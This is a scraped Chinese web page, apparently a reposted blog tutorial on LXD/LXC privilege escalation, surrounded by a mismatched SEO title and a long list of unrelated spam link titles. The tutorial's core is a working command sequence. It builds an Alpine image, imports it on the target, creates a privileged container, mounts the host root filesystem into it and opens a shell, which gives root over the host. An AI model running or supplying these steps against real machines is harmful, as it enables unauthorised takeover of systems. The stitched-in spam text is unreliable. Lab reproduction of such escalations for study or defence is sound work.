当前位置: 首页 > news >正文

网站底部背景公司优化是什么意思?

网站底部背景,公司优化是什么意思?,上海注册公司代理电话,网站后台地址忘了lxd/lxc提权 漏洞介绍 lxd是一个root进程,它可以负责执行任意用户的lxd,unix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查和匹配 原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘&#xf…

lxd/lxc提权

漏洞介绍

lxd是一个root进程,它可以负责执行任意用户的lxd,unix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查和匹配

原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果

提权复现

环境:攻击机kali 192.168.31.131 靶机 192.168.31.134

image-20231125152324099

image-20231125152414099

在攻击机kali上操作

通过git将构建好的alpine镜像克隆到本地,并构建

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

然后将自己操作系统对应架构tar文件发送到靶机上

python -m http.server 8848

然后在下载的目录上使用此命令导入镜像

lxc image import ./alpine*.tar.gz --alias myimage 

初始化镜像,一路回车选择默认,不过会有几个显示以及存在default,让你重命名的,选择了就可以

lxd init

可能最后报错,但是也没关系

例如

image-20231125171111579

运行镜像

lxc init myimage mycontainer -c security.privileged=true

将/root挂载到镜像中

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

与镜像交互

lxc start mycontainer
lxc exec mycontainer /bin/sh
lxc start mycontainer
lxc exec mycontainer /bin/sh

image-20231125171236266

http://www.yidumall.com/news/65150.html

相关文章:

  • 精神文明建设专题网站深圳网站建设专业乐云seo
  • php制作投票网站网络营销外包
  • 网站开发者工具百度搜索风云榜排行榜
  • 网站建设网站最新消息
  • 现在网站一般都是什么语言做的网站推广外贸
  • 旅游商务网站开发百度指数api
  • 德州做网站建设的公司哪家好杭州seo价格
  • 电子商务网站建设项目书it培训班真的有用吗
  • ipfs做网站西地那非
  • 哪个网站可以做社工试题青岛seo外包公司
  • 岳阳做网站百度新站关键词排名
  • 效果图网站推荐大全面包砖长沙百度网站排名优化
  • 平湖企业网站建设企业邮箱账号
  • flash网站的制作网络营销形式
  • 找网络公司建网站的流程百度信息流推广
  • 自己有网站怎么推广产品线上推广方式都有哪些
  • 深圳网站建设网络推广seo优化常识
  • 做数学题网站如何优化网站快速排名
  • 微网站套餐免费域名解析网站
  • 做微信商城网站公司百度官方网平台
  • 盘锦网站建设咨询百度经验首页
  • 手机网站制作流程图专业优化网站排名
  • 网站建设夜猫seo门户 site
  • 智能响应式网站关键词排名优化官网
  • 织梦素材网站模板免费下载爱站网ip反域名查询
  • 招标网站都有哪些百度关键词优化首选667seo
  • 全球建筑设计公司前十名seo搜索引擎优化视频
  • 学习日语的好网站怎么做推广网络
  • 装饰工程造价苏州企业网站关键词优化
  • 电商设计网站网站建设产品介绍